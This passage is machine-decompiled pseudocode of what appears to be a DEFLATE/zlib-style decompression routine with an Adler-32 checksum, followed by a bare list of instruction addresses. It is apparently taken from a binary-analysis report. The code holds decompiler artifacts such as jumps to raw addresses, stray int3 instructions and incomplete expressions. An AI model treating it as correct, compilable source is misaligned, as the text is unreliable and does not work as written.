													L278:
													__eflags = _t1050;
													if(_t1050 != 0) {
														L281:
														_t997 =  *(_t1065 - 4);
														__eflags = _t1050 - 8;
														if(_t1050 >= 8) {
															L275:
															_t690 = _t997 & 0x000000ff;
															_t1050 = _t1050 - 8;
															__eflags = _t1050;
															 *(_t1065 - 4) = _t997 >> 8;
															goto L276;
														} else {
															L282:
															while(1) {
																L272:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	break;
																}
																L273:
																_t618 = ( *_t847 & 0x000000ff) << _t1050;
																_t1050 = _t1050 + 8;
																_t997 = _t997 | _t618;
																_t847 = _t847 + 1;
																 *(_t1065 - 4) = _t997;
																__eflags = _t1050 - 8;
																if(_t1050 < 8) {
																	continue;
																} else {
																	L274:
																	_t898 =  *(_t1065 - 8);
																	goto L275;
																}
																goto L295;
															}
															L284:
															 *_t1030 = 0x29;
															goto L285;
														}
													} else {
														L279:
														__eflags = _t847 -  *(_t1065 - 0x20);
														if(_t847 >=  *(_t1065 - 0x20)) {
															L283:
															 *_t1030 = 0x2a;
															goto L285;
														} else {
															L280:
															_t690 =  *_t847 & 0x000000ff;
															_t847 = _t847 + 1;
															L276:
															 *(_t1065 - 0x24) = _t690;
															_t618 =  *(_t1030 + 0x10) << 0x00000008 |  *(_t1065 - 0x24);
															_t898 = _t898 + 1;
															__eflags = _t898;
															 *(_t1030 + 0x10) = _t618;
															continue;
														}
													}
													goto L295;
												}
												goto L290;
											}
										} else {
											L253:
											while(1) {
												L254:
												__eflags = _t847 -  *(_t1065 - 0x20);
												if(_t847 >=  *(_t1065 - 0x20)) {
													break;
												}
												L255:
												_t695 = ( *_t847 & 0x000000ff) << _t1050;
												_t1050 = _t1050 + 8;
												_t968 = _t968 | _t695;
												_t847 = _t847 + 1;
												 *(_t1065 - 4) = _t968;
												_t618 = _t1050 & 0x00000007;
												__eflags = _t1050 - _t618;
												if(_t1050 < _t618) {
													continue;
												} else {
													goto L256;
												}
												goto L295;
											}
											L271:
											 *_t1030 = 0x20;
											goto L285;
										}
									}
								} else {
									L49:
									__eflags = _t1050 - 0xf;
									if(_t1050 < 0xf) {
										_t1021 =  *(_t847 + 1) & 0x000000ff;
										_t861 = _t1050;
										_t732 =  *_t847 & 0x000000ff;
										_t847 = _t847 + 2;
										_t1030 =  *(_t1065 - 0x14);
										 *(_t1065 - 0x18) = _t847;
										 *(_t1065 - 4) =  *(_t1065 - 4) | (_t1021 << 0x00000008 | _t732) << _t861;
										_t1050 = _t1050 + 0x10;
										__eflags = _t1050;
										_t968 =  *(_t1065 - 4);
									}
									_t725 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
									 *(_t1065 - 0x1c) = _t725;
									__eflags = _t725;
									if(_t725 < 0) {
										L53:
										goto 0x41f1472;
										asm("int3");
										asm("int3");
										asm("int3");
										do {
											L54:
											_t727 = _t968 >> _t861;
											_t861 = _t861 + 1;
											_t847 =  *((short*)(_t1030 + 0x960 + ((_t727 & 0x00000001) +  !_t847) * 2));
											__eflags = _t847;
										} while (_t847 < 0);
										 *(_t1065 - 0x1c) = _t847;
										_t847 =  *(_t1065 - 0x18);
									} else {
										L52:
										_t861 = _t725 >> 9;
									}
									L56:
									_t618 =  *(_t1065 - 8);
									_t1050 = _t1050 - _t861;
									_t968 = _t968 >> _t861;
									 *(_t1065 - 4) = _t968;
									 *( *(_t1065 - 0x10)) = _t618;
									_t861 =  *(_t1065 - 0x1c);
									__eflags = _t861 & 0x00000100;
									if((_t861 & 0x00000100) != 0) {
										L83:
										_t171 = _t1065 - 0x10;
										 *_t171 =  *(_t1065 - 0x10) + 1;
										__eflags =  *_t171;
										goto L84;
									} else {
										L57:
										_t730 =  *(_t1065 - 0x10);
										 *(_t730 + 1) = _t861;
										 *(_t1065 - 0x10) = _t730 + 2;
										continue;
										do {
											do {
												while(1) {
													L39:
													_t860 =  *(_t1065 - 0x20) - _t847;
													__eflags = _t860 - 4;
													if(_t860 < 4) {
														goto L58;
													}
													goto L40;
												}
												L26:
												__eflags = _t870;
											} while (_t870 == 0);
											goto 0x41f140c;
											asm("int3");
											_t734 =  *_t740;
											 *_t1030 = _t734;
											_t1030 =  *(_t1065 - 0x14);
											__eflags = _t870 - 1;
											if(_t870 > 1) {
												L29:
												L36:
												goto 0x41f1448;
												asm("int3");
												 *(_t968 + 1) =  *((intOrPtr*)(_t734 + 1));
												_t968 =  *(_t1065 - 4);
											}
											L38:
											_t86 = _t1065 - 0x10;
											 *_t86 =  *(_t1065 - 0x10) + _t870;
											__eflags =  *_t86;
											while(1) {
												L39:
												_t860 =  *(_t1065 - 0x20) - _t847;
												__eflags = _t860 - 4;
												if(_t860 < 4) {
													goto L58;
												}
												goto L40;
											}
											L33:
											 *(_t1065 - 0x10) = _t1030;
											_t1030 =  *(_t1065 - 0x14);
											 *(_t1065 - 0xc) = _t968;
											_t968 =  *(_t1065 - 4);
											 *(_t1065 - 8) = _t870;
											__eflags = _t870;
										} while (_t870 <= 0);
										goto 0x41f1434;
										asm("int3");
										_t734 =  *_t624;
										 *_t1030 = _t734;
										_t1030 =  *(_t1065 - 0x14);
										__eflags = _t870 - 1;
										if(_t870 > 1) {
											goto L36;
										}
										goto L38;
									}
								}
							}
							L295:
							_t972 =  *(_t1065 - 4);
							L296:
							 *(_t1030 + 4) = _t1050;
							asm("bts ecx, esi");
							__eflags = _t1050 - 0x20;
							_t630 =  >=  ? 0 : 0;
							_t874 = 0 ^ _t630;
							__eflags = _t1050 - 0x40;
							_t631 =  >=  ? _t874 : _t630;
							 *(_t1030 + 0x20) =  *(_t1065 - 0x28);
							_t974 =  *(_t1065 - 0x10) -  *(_t1065 + 0x10);
							__eflags =  *(_t1065 + 0x18) & 0x00000009;
							 *(_t1030 + 0x24) =  *(_t1065 - 8);
							 *(_t1030 + 0x28) =  *(_t1065 - 0x38);
							 *((intOrPtr*)(_t1030 + 0x3c)) =  *((intOrPtr*)(_t1065 - 0x48));
							 *(_t1030 + 0x38) = _t874 - 0x00000001 & _t972;
							 *(_t1065 - 0x10) = _t974;
							 *((intOrPtr*)( *((intOrPtr*)(_t1065 + 8)))) = _t847 -  *(_t1065 - 0x3c);
							_t851 =  *(_t1065 - 0xc);
							 *( *(_t1065 + 0x14)) = _t974;
							if(( *(_t1065 + 0x18) & 0x00000009) != 0) {
								L297:
								__eflags = _t851;
								if(_t851 >= 0) {
									L298:
									_t1052 =  *(_t1030 + 0x1c);
									_t877 = _t1052 & 0x0000ffff;
									_t641 = (0x5e6ea9af * _t974 >> 0x20 >> 0xb) * 0x15b0;
									_t1053 = _t1052 >> 0x10;
									 *(_t1065 - 0x3c) = _t1053;
									_t978 =  *(_t1065 - 0x10) - _t641;
									__eflags =  *(_t1065 - 0x10);
									 *(_t1065 - 0x34) = _t978;
									if( *(_t1065 - 0x10) != 0) {
										L299:
										_t853 = _t978;
										do {
											L300:
											_t979 = 0;
											 *(_t1065 + 0x14) = 0;
											__eflags = _t853 - 7;
											if(_t853 > 7) {
												L301:
												goto 0x41f15c6;
												asm("int3");
												asm("int3");
												asm("int3");
												L302:
												_t1033 = _t1030 - _t641;
												__eflags = _t1033;
												do {
													L303:
													_t979 =  &(_t979[2]);
													_t879 = _t877 + ( *_t641 & 0x000000ff);
													_t880 = _t879 + ( *( *(_t1065 + 0x10) + 1) & 0x000000ff);
													_t881 = _t880 + ( *(2 +  *(_t1065 + 0x10)) & 0x000000ff);
													_t882 = _t881 + ( *( *(_t1065 + 0x10) + 3) & 0x000000ff);
													_t883 = _t882 + ( *( *(_t1065 + 0x10) + 4) & 0x000000ff);
													_t884 = _t883 + ( *( *(_t1065 + 0x10) + 5) & 0x000000ff);
													_t885 = _t884 + ( *( *(_t1065 + 0x10) + 6) & 0x000000ff);
													_t877 = _t885 + ( *( *(_t1065 + 0x10) + 7) & 0x000000ff);
													_t671 =  *(_t1065 + 0x10) + 8;
													_t1053 = _t1053 + _t879 + _t880 + _t881 + _t882 + _t883 + _t884 + _t885 + _t877;
													 *(_t1065 + 0x10) = _t671;
													__eflags = _t1033 + _t671 - _t853;
													_t641 =  *(_t1065 + 0x10);
												} while (_t1033 + _t671 < _t853);
												 *(_t1065 + 0x14) = _t979;
												 *(_t1065 - 0x3c) = _t1053;
											}
											L305:
											_t1030 = 0;
											 *((intOrPtr*)(_t1065 + 8)) = 0;
											__eflags = _t979 - _t853;
											if(_t979 < _t853) {
												L306:
												__eflags = _t853 - _t979 - 2;
												if(_t853 - _t979 >= 2) {
													L307:
													_t651 =  *(_t1065 + 0x14);
													_t1056 =  *(_t1065 + 0x10);
													_t854 = 0;
													_t990 = (_t853 - _t651 - 2 >> 1) + 1;
													__eflags = _t990;
													 *(_t1065 + 0x14) = _t651 + _t990 * 2;
													do {
														L308:
														_t878 = _t877 + ( *_t1056 & 0x000000ff);
														_t654 =  *(_t1056 + 1) & 0x000000ff;
														_t1030 = _t1030 + _t878;
														_t1056 = 2 + _t1056;
														_t877 = _t878 + _t654;
														_t854 = _t854 + _t877;
														_t990 = _t990 - 1;
														__eflags = _t990;
													} while (_t990 != 0);
													_t979 =  *(_t1065 + 0x14);
													 *(_t1065 + 0x10) = _t1056;
													_t1053 =  *(_t1065 - 0x3c);
													 *((intOrPtr*)(_t1065 + 8)) = _t854;
													_t853 =  *(_t1065 - 0x34);
												}
												L310:
												__eflags = _t979 - _t853;
												if(_t979 < _t853) {
													_t984 =  *(_t1065 + 0x10);
													_t877 = _t877 + ( *_t984 & 0x000000ff);
													_t1053 = _t1053 + _t877;
													_t985 =  &(_t984[1]);
													__eflags = _t985;
													 *(_t1065 + 0x10) = _t985;
												}
												L312:
												_t641 =  *((intOrPtr*)(_t1065 + 8)) + _t1030;
												_t1053 = _t1053 + _t641;
												__eflags = _t1053;
											}
											L313:
											L314:
											_t877 = _t877 + (_t641 * _t877 >> 0x20 >> 0xf) * 0xffff000f;
											_t641 = (0x80078071 * _t1053 >> 0x20 >> 0xf) * 0xffff000f;
											_t1053 = _t1053 + _t641;
											_t586 = _t1065 - 0x10;
											 *_t586 =  *(_t1065 - 0x10) - _t853;
											__eflags =  *_t586;
											_t853 = 0x15b0;
											 *(_t1065 - 0x3c) = _t1053;
											 *(_t1065 - 0x34) = 0x15b0;
										} while ( *_t586 != 0);
										goto 0x41f15ef;
										asm("int3");
									}
									L316:
									_t1055 = (_t1053 << 0x10) + _t877;
									 *(_t1030 + 0x1c) = _t1055;
									__eflags = _t851;
									if(_t851 == 0) {
										__eflags =  *(_t1065 + 0x18) & 0x00000001;
										if(( *(_t1065 + 0x18) & 0x00000001) != 0) {
											__eflags = _t1055 -  *(_t1030 + 0x10);
											_t851 =  !=  ? 0xfffffffe : _t851;
										}
									}
								}
							}
							L319:
							return _t851;
							L320:
							L58:
							__eflags = _t1050 - 0xf;
							if(_t1050 >= 0xf) {
								L75:
								_t603 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
								 *(_t1065 - 8) = _t603;
								__eflags = _t603;
								if(_t603 < 0) {
									L77:
									goto 0x41f149b;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L78:
										_t605 = _t968 >> _t860;
										_t860 = _t860 + 1;
										_t847 =  *((short*)(_t1030 + 0x960 + ((_t605 & 0x00000001) +  !_t847) * 2));
										__eflags = _t847;
									} while (_t847 < 0);
									 *(_t1065 - 8) = _t847;
									_t847 =  *(_t1065 - 0x18);
								} else {
									L76:
									_t860 = _t603 >> 9;
									_t618 = _t603 & 0x000001ff;
									 *(_t1065 - 8) = _t618;
								}
								L80:
								_t968 = _t968 >> _t860;
								_t1050 = _t1050 - _t860;
								_t861 =  *(_t1065 - 8);
								 *(_t1065 - 4) = _t968;
								__eflags = _t861 - 0x100;
								if(_t861 >= 0x100) {
									goto L84;
								} else {
									L81:
									_t769 =  *(_t1065 - 0x10);
									__eflags = _t769 -  *((intOrPtr*)(_t1065 - 0x40));
									if(_t769 >=  *((intOrPtr*)(_t1065 - 0x40))) {
										L240:
										 *(_t1065 - 0xc) = 2;
										 *_t1030 = 0x18;
										goto L292;
									} else {
										L82:
										 *_t769 = _t861;
										 *(_t1065 - 0x10) = _t769 + 1;
										continue;
									}
								}
							} else {
								L59:
								__eflags = _t860 - 2;
								if(_t860 >= 2) {
									L73:
									_t969 =  *(_t847 + 1) & 0x000000ff;
									_t625 =  *_t847 & 0x000000ff;
									_t847 = _t847 + 2;
									_t860 = _t1050;
									 *(_t1065 - 0x18) = _t847;
									 *(_t1065 - 4) =  *(_t1065 - 4) | _t969 << _t1050 + 0x00000008 | _t625 << _t860;
									_t1050 = _t1050 + 0x10;
									__eflags = _t1050;
									_t968 =  *(_t1065 - 4);
									goto L74;
								} else {
									do {
										L60:
										_t618 = _t968 & 0x000003ff;
										_t1031 =  *((short*)(_t1030 + 0x160 + _t618 * 2));
										__eflags = _t1031;
										if(_t1031 < 0) {
											L64:
											__eflags = _t1050 - 0xa;
											if(_t1050 <= 0xa) {
												goto L69;
											} else {
												L65:
												 *(_t1065 - 0x1c) = _t860;
												while(1) {
													L67:
													_t1031 =  *((short*)( *(_t1065 - 0x14) + 0x960 + ((_t968 >> _t860 & 0x00000001) +  !_t1031) * 2));
													_t860 =  *(_t1065 - 0x1c) + 1;
													 *(_t1065 - 0x1c) = _t860;
													__eflags = _t1031;
													if(_t1031 >= 0) {
														goto L74;
													}
													L68:
													_t618 = _t860 + 1;
													__eflags = _t1050 - _t618;
													if(_t1050 >= _t618) {
														continue;
													} else {
														goto L69;
													}
													goto L295;
												}
												goto L74;
											}
										} else {
											L61:
											_t1035 = _t1031 >> 9;
											__eflags = _t1035;
											if(_t1035 == 0) {
												L69:
												_t1030 =  *(_t1065 - 0x14);
												L70:
												__eflags = _t847 -  *(_t1065 - 0x20);
												if(_t847 >=  *(_t1065 - 0x20)) {
													L239:
													 *_t1030 = 0x17;
													goto L285;
												} else {
													goto L71;
												}
											} else {
												L62:
												__eflags = _t1050 - _t1035;
												if(_t1050 >= _t1035) {
													L74:
													_t1030 =  *(_t1065 - 0x14);
													goto L75;
												} else {
													L63:
													goto L69;
												}
											}
										}
										goto L295;
										L71:
										_t860 = _t1050;
										_t675 = ( *_t847 & 0x000000ff) << _t860;
										_t847 = _t847 + 1;
										_t968 = _t968 | _t675;
										 *(_t1065 - 0x18) = _t847;
										_t1050 = _t1050 + 8;
										 *(_t1065 - 4) = _t968;
										__eflags = _t1050 - 0xf;
									} while (_t1050 < 0xf);
									goto L75;
								}
							}
							goto L295;
						}
					}
					L142:
					 *(_t1065 - 0xc) = 0x40 + _t600 * 0xda0 + _t1030;
					memset(_t1065 - 0xd0, 0, 0x40);
					memset( *(_t1065 - 0xc) + 0x120, 0, 0x800);
					memset( *(_t1065 - 0xc) + 0x920, 0, 0x480);
					_t903 = 0;
					_t1068 = _t1068 + 0x24;
					_t1003 = _t1030 + ( *(_t1030 + 0x18) + 0xb) * 4;
					 *(_t1065 - 0x44) = _t1003;
					if( *_t1003 > 0) {
						L143:
						_t1030 =  *(_t1065 - 0xc);
						do {
							L144:
							_t845 =  *(_t903 + _t1030) & 0x000000ff;
							_t903 = _t903 + 1;
							 *((intOrPtr*)(_t1065 + _t845 * 4 - 0xd0)) =  *((intOrPtr*)(_t1065 + _t845 * 4 - 0xd0)) + 1;
						} while (_t903 <  *_t1003);
					}
					L145:
					goto 0x41f1500;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					L146:
					 *(_t1065 - 0x8c) = _t903;
					 *(_t1065 - 0x90) = _t903;
					 *(_t1065 - 0x2c) = _t903;
					 *(_t1065 - 0x30) = _t903;
					do {
						L147:
						_t782 =  *((intOrPtr*)(_t1065 + _t1003 - 0xd4));
						_t905 = _t903 + _t782 + _t903 + _t782;
						_t1030 = _t1030 + _t782;
						_t783 =  *((intOrPtr*)(_t1065 + _t1003 - 0xd0));
						 *(_t1065 - 0x30) =  *(_t1065 - 0x30) + _t783;
						 *((intOrPtr*)(_t1065 + _t1003 - 0x90)) = _t905;
						_t784 =  *((intOrPtr*)(_t1065 + _t1003 - 0xcc));
						_t907 = _t905 + _t783 + _t905 + _t783;
						 *(_t1065 - 0x2c) =  *(_t1065 - 0x2c) + _t784;
						 *((intOrPtr*)(_t1065 + _t1003 - 0x8c)) = _t907;
						_t903 = _t907 + _t784 + _t907 + _t784;
						 *(_t1065 + _t1003 - 0x88) = _t903;
						_t1003 = _t1003 + 0xc;
					} while (_t1003 <= 0x40);
					 *(_t1065 - 0x4c) = _t903;
					 *(_t1065 - 0x24) = _t1030;
					_t1030 =  *(_t1065 - 0x14);
					_t910 =  *(_t1065 - 0x24) +  *(_t1065 - 0x2c) +  *(_t1065 - 0x30);
					if( *(_t1065 - 0x4c) == 0x10000 || _t910 <= 1) {
						L150:
						_t787 =  *(_t1065 - 0x44);
						 *(_t1065 - 0x30) = 0xffffffff;
						 *(_t1065 - 0x4c) = 0;
						if( *_t787 > 0) {
							L151:
							_t1064 =  *(_t1065 - 0x4c);
							do {
								L152:
								L153:
								_t922 =  *(_t1064 + _t787) & 0x000000ff;
								 *(_t1065 - 0x44) = _t922;
								if(_t922 != 0) {
									L154:
									_t824 =  *(_t1065 + _t922 * 4 - 0x90);
									 *(_t1065 - 0x2c) = _t824;
									 *(_t1065 + _t922 * 4 - 0x90) = _t824 + 1;
									 *(_t1065 - 0x24) = _t922;
									if(_t922 != 0) {
										L155:
										do {
											L156:
											 *(_t1065 - 0x2c) =  *(_t1065 - 0x2c) >> 1;
											_t844 =  *(_t1065 - 0x24) - 1;
											_t1003 = _t1003 + _t1003 |  *(_t1065 - 0x2c) & 0x00000001;
											 *(_t1065 - 0x24) = _t844;
										} while (_t844 != 0);
										_t922 =  *(_t1065 - 0x44);
									}
									L158:
									if(_t922 > 0xa) {
										L164:
										_t828 =  *(_t1065 - 0xc) + 0x120 + (_t1003 & 0x000003ff) * 2;
										_t847 =  *(_t1065 - 0x30);
										 *(_t1065 - 0x44) = _t828;
										_t829 =  *_t828;
										 *(_t1065 - 0x2c) = _t829;
										__eflags = _t829;
										if(_t829 == 0) {
											 *( *(_t1065 - 0x44)) = _t847;
											_t829 = _t847;
											_t847 = _t847 - 2;
											__eflags = _t847;
											 *(_t1065 - 0x2c) = _t829;
											 *(_t1065 - 0x30) = _t847;
										}
										L166:
										_t1011 = _t1003 >> 9;
										__eflags = _t922 - 0xb;
										if(_t922 > 0xb) {
											L167:
											_t923 = _t922 + 0xfffffff5;
											__eflags = _t923;
											 *(_t1065 - 0x24) = _t923;
											_t924 =  *(_t1065 - 0x2c);
											do {
												L168:
												_t1011 = _t1011 >> 1;
												_t834 = 0x48f - _t924 - (_t1011 & 0x00000001);
												_t927 =  *( *(_t1065 - 0xc) + 0x91e) & 0x0000ffff;
												__eflags = _t927;
												if(_t927 != 0) {
													_t924 = _t927;
												} else {
													 *( *(_t1065 - 0xc) + _t834 * 2) = _t847;
													_t835 =  *(_t1065 - 0x30);
													_t924 = _t835;
													_t836 = _t835 - 2;
													 *(_t1065 - 0x30) = _t836;
													_t847 = _t836;
												}
												L171:
												_t361 = _t1065 - 0x24;
												 *_t361 =  *(_t1065 - 0x24) - 1;
												__eflags =  *_t361;
											} while ( *_t361 != 0);
											 *(_t1065 - 0x2c) = _t924;
											_t829 = _t924;
										}
										L173:
										_t1003 = (_t1011 >> 0x00000001 & 0x00000001) - _t829;
										__eflags = _t1003;
										 *( *(_t1065 - 0xc) + 0x91e + _t1003 * 2) = _t1064;
									} else {
										L159:
										_t841 = (_t922 << 0x00000009 | _t1064) & 0x0000ffff;
										 *(_t1065 - 0x44) = _t841;
										if(_t1003 < 0x400) {
											L160:
											goto 0x41f152a;
											asm("int3");
											asm("int3");
											asm("int3");
											L161:
											_t842 = _t841 << _t922;
											 *(_t1065 - 0x4c) = _t842 + _t842;
											_t932 =  *(_t1065 - 0xc) + _t1003 * 2 + 0x120;
											do {
												L162:
												 *_t932 = _t1030;
												_t1003 = _t1003 + _t842;
												_t932 =  &(_t932[ *(_t1065 - 0x4c)]);
											} while (_t1003 < 0x400);
											_t1030 =  *(_t1065 - 0x14);
										}
									}
								}
								L174:
								_t787 =  *(_t1030 + 0x18);
								_t1064 = _t1064 + 1;
							} while (_t1064 <  *((intOrPtr*)(_t1030 + 0x2c + _t787 * 4)));
							goto 0x41f1540;
							asm("int3");
						}
						L176:
						if( *(_t1030 + 0x18) != 2) {
							L217:
							 *(_t1030 + 0x18) =  *(_t1030 + 0x18) - 1;
							goto L141;
						} else {
							L177:
							_t911 = 0;
							while(1) {
								L178:
								_t1004 =  *(_t1065 - 4);
								while(1) {
									L179:
									 *(_t1065 - 8) = _t911;
									if(_t911 >=  *(_t1030 + 0x30) +  *(_t1030 + 0x2c)) {
										break;
									}
									L180:
									if(_t1064 >= 0xf) {
										L197:
										_t802 =  *((short*)(_t1030 + 0x1ca0 + (_t1004 & 0x000003ff) * 2));
										 *(_t1065 - 0x28) = _t802;
										if(_t802 < 0) {
											L199:
											L200:
											do {
												L201:
												 *(_t1065 - 0x28) =  !( *(_t1065 - 0x28));
												_t804 = _t1004 >> _t911;
												_t911 = _t911 + 1;
												_t618 =  *((short*)(_t1030 + 0x24a0 + ((_t804 & 0x00000001) +  *(_t1065 - 0x28)) * 2));
												 *(_t1065 - 0x28) = _t618;
												__eflags = _t618;
											} while (__eflags < 0);
										} else {
											L198:
											_t911 = _t802 >> 9;
											_t618 = _t802 & 0x000001ff;
											 *(_t1065 - 0x28) = _t618;
										}
										L202:
										_t1004 = _t1004 >> _t911;
										_t1050 = _t1064 - _t911;
										 *(_t1065 - 4) = _t1004;
										 *(_t1065 - 0x1c) = _t1050;
										if(_t618 >= 0x10) {
											L204:
											if(__eflags != 0) {
												L207:
												_t912 =  *((char*)(_t618 + 0x41e0ff0));
												 *(_t1065 - 0x38) = _t912;
												__eflags = _t1050 - _t912;
												if(_t1050 >= _t912) {
													L211:
													_t1050 = _t1050 - _t912;
													 *(_t1065 - 0x1c) = _t1050;
													_t913 =  *(_t1065 - 0x14);
													_t1046 = ((0x00000001 << _t912) - 0x00000001 & _t1004) +  *((char*)(_t618 + 0x41e0ff8));
													__eflags =  *(_t1065 - 0x28) - 0x10;
													_t808 =  *(_t1065 - 8);
													 *(_t1065 - 4) = _t1004 >> _t912;
													if(__eflags != 0) {
														_t1007 = 0;
														__eflags = 0;
													} else {
														_t1007 =  *(_t808 + _t913 + 0x2923) & 0x000000ff;
													}
													L214:
													memset(_t808 + _t913 + 0x2924, _t1007, _t1046);
													_t1068 = _t1068 + 0xc;
													_t911 =  *(_t1065 - 8) + _t1046;
													_t1030 =  *(_t1065 - 0x14);
													L178:
													_t1004 =  *(_t1065 - 4);
													continue;
												} else {
													while(1) {
														L208:
														__eflags = _t847 -  *(_t1065 - 0x20);
														if(_t847 >=  *(_t1065 - 0x20)) {
															break;
														}
														L209:
														_t618 = ( *_t847 & 0x000000ff) << _t1050;
														_t847 = _t847 + 1;
														_t912 =  *(_t1065 - 0x38);
														_t1004 = _t1004 | _t618;
														_t1050 = _t1050 + 8;
														 *(_t1065 - 0x18) = _t847;
														 *(_t1065 - 4) = _t1004;
														__eflags = _t1050 - _t912;
														if(_t1050 < _t912) {
															continue;
														} else {
															L210:
															_t618 =  *(_t1065 - 0x28);
															goto L211;
														}
														goto L295;
													}
													L251:
													 *_t1030 = 0x12;
													goto L285;
												}
											} else {
												L205:
												_t812 =  *(_t1065 - 8);
												__eflags = _t812;
												if(_t812 == 0) {
													L268:
													_t689 = _t812 | 0xffffffff;
													 *_t1030 = 0x11;
													goto L291;
												} else {
													L206:
													_t618 =  *(_t1065 - 0x28);
													goto L207;
												}
											}
										} else {
											L203:
											_t917 =  *(_t1065 - 8);
											 *(_t1030 + 0x2924 + _t917) = _t618;
											_t911 = _t917 + 1;
											continue;
										}
									} else {
										L181:
										if( *(_t1065 - 0x20) - _t847 >= 2) {
											L195:
											_t1008 =  *(_t847 + 1) & 0x000000ff;
											_t815 =  *_t847 & 0x000000ff;
											_t847 = _t847 + 2;
											_t911 = _t1064;
											 *(_t1065 - 0x18) = _t847;
											 *(_t1065 - 4) =  *(_t1065 - 4) | _t1008 << _t1064 + 0x00000008 | _t815 << _t911;
											_t1064 = _t1064 + 0x10;
											__eflags = _t1064;
											_t1004 =  *(_t1065 - 4);
											goto L196;
										} else {
											do {
												L182:
												_t618 = _t1004 & 0x000003ff;
												_t1047 =  *((short*)(_t1030 + 0x1ca0 + _t618 * 2));
												if(_t1047 < 0) {
													L186:
													__eflags = _t1064 - 0xa;
													if(__eflags <= 0) {
														goto L191;
													} else {
														L187:
														L188:
														 *(_t1065 - 0x24) = _t911;
														while(1) {
															L189:
															_t1047 =  *((short*)( *(_t1065 - 0x14) + 0x24a0 + ((_t1004 >> _t911 & 0x00000001) +  !_t1047) * 2));
															_t911 =  *(_t1065 - 0x24) + 1;
															 *(_t1065 - 0x24) = _t911;
															__eflags = _t1047;
															if(__eflags >= 0) {
																goto L196;
															}
															L190:
															_t618 = _t911 + 1;
															__eflags = _t1064 - _t618;
															if(__eflags >= 0) {
																continue;
															} else {
																goto L191;
															}
															goto L295;
														}
														goto L196;
													}
												} else {
													L183:
													_t1049 = _t1047 >> 9;
													if(_t1049 == 0) {
														L191:
														_t1030 =  *(_t1065 - 0x14);
														L192:
														if(_t847 >=  *(_t1065 - 0x20)) {
															L250:
															 *_t1030 = 0x10;
															goto L285;
														} else {
															goto L193;
														}
													} else {
														L184:
														if(_t1064 >= _t1049) {
															L196:
															_t1030 =  *(_t1065 - 0x14);
															goto L197;
														} else {
															L185:
															goto L191;
														}
													}
												}
												goto L295;
												L193:
												_t911 = _t1064;
												_t819 = ( *_t847 & 0x000000ff) << _t911;
												_t847 = _t847 + 1;
												_t1004 = _t1004 | _t819;
												 *(_t1065 - 0x18) = _t847;
												_t1064 = _t1064 + 8;
												 *(_t1065 - 4) = _t1004;
											} while (_t1064 < 0xf);
											goto L197;
										}
									}
									goto L295;
								}
								L215:
								_t1005 =  *(_t1030 + 0x2c);
								_t791 =  *(_t1030 + 0x30) + _t1005;
								__eflags = _t791 - _t911;
								if(_t791 != _t911) {
									L269:
									_t689 = _t791 | 0xffffffff;
									 *_t1030 = 0x15;
									goto L291;
								} else {
									L216:
									memcpy(_t1030 + 0x40, _t1030 + 0x2924, _t1005);
									_t797 =  *(_t1030 + 0x2c) + 0x2924 + _t1030;
									__eflags = _t797;
									memcpy(_t1030 + 0xde0, _t797,  *(_t1030 + 0x30));
									_t1068 = _t1068 + 0x18;
									goto L217;
								}
								goto L295;
							}
						}
					} else {
						L267:
						 *(_t1065 - 0xc) = 0xffffffff;
						 *_t1030 = 0x23;
						goto L292;
					}
					goto L295;
				}
			}

0x041d5d95
0x041d5d95
0x041d5d95
0x041d5d96
0x041d5d98
0x041d5d9a
0x041d5d9c
0x041d5d9d
0x041d5d9f
0x041d5da1
0x041d5da8
0x041d5dae
0x041d5db6
0x041d5db9
0x041d5dbe
0x041d5dc3
0x041d5dc8
0x041d5dcd
0x041d5dd5
0x041d5ddd
0x041d5de5
0x041d5ded
0x041d5df5
0x041d5dfb
0x041d5e03
0x041d5e07
0x041d5e0c
0x041d5e11
0x041d5e16
0x041d5e1b
0x041d5e20
0x041d5e25
0x041d5e2d
0x041d5e32
0x041d5e3a
0x041d5e44
0x041d5e4e
0x041d5f59
0x041d5f59
0x041d5f59
0x041d5f5e
0x00000000
0x00000000
0x041d63fe
0x041d63fe
0x041d58f8
0x041d58f8
0x041d58fb
0x041d58fd
0x041d5900
0x00000000
0x00000000
0x041d5906
0x041d590c
0x041d590f
0x041d5912
0x00000000
0x041d5918
0x041d5918
0x041d5918
0x041d591b
0x041d591d
0x041d5921
0x041d5923
0x041d5926
0x041d592e
0x041d5933
0x041d5936
0x041d5936
0x041d5939
0x041d5939
0x041d5943
0x041d594b
0x041d594e
0x041d5950
0x041d5959
0x041d5959
0x041d595e
0x041d595f
0x041d5960
0x041d5961
0x041d5961
0x041d5965
0x041d5967
0x041d596b
0x041d596d
0x041d5975
0x041d5975
0x041d5979
0x041d597c
0x041d5952
0x041d5952
0x041d5954
0x041d5954
0x041d597f
0x041d597f
0x041d5981
0x041d5983
0x041d5986
0x041d5989
0x041d598f
0x041d5b5a
0x041d5b5a
0x041d5b60
0x041d5b63
0x041d5b69
0x041d6406
0x041d6406
0x041d640d
0x041d6413
0x041d6419
0x041d641c
0x041d641f
0x041d6421
0x041d645e
0x041d645e
0x041d6461
0x041d5714
0x041d571b
0x041d5723
0x041d5726
0x041d5728
0x041d5736
0x041d5736
0x041d573b
0x041d573c
0x041d573d
0x041d5740
0x041d5740
0x041d5744
0x041d5746
0x041d574c
0x041d5754
0x041d5754
0x041d5758
0x041d575b
0x041d575e
0x041d572a
0x041d572a
0x041d572c
0x041d572f
0x041d572f
0x041d5761
0x041d5761
0x041d5763
0x041d5765
0x041d576c
0x041d5773
0x041d5776
0x041d5779
0x041d577c
0x041d577e
0x041d57be
0x041d57c1
0x041d57c4
0x041d57c7
0x041d57c9
0x041d57d5
0x041d57d5
0x041d57dd
0x041d57e0
0x041d57e5
0x041d57e8
0x041d57ec
0x041d57ef
0x041d57f1
0x041d57f4
0x041d582f
0x041d582f
0x041d5832
0x041d5896
0x041d5896
0x041d589b
0x041d58a0
0x041d58a0
0x041d58a3
0x041d58a6
0x041d58ac
0x041d58af
0x041d58b3
0x041d58b6
0x041d58b9
0x041d58bc
0x041d58bc
0x00000000
0x041d5834
0x041d5834
0x041d5834
0x041d5837
0x00000000
0x041d5839
0x041d5839
0x041d5839
0x041d583e
0x041d5844
0x041d5846
0x041d5849
0x041d5850
0x041d5850
0x041d5852
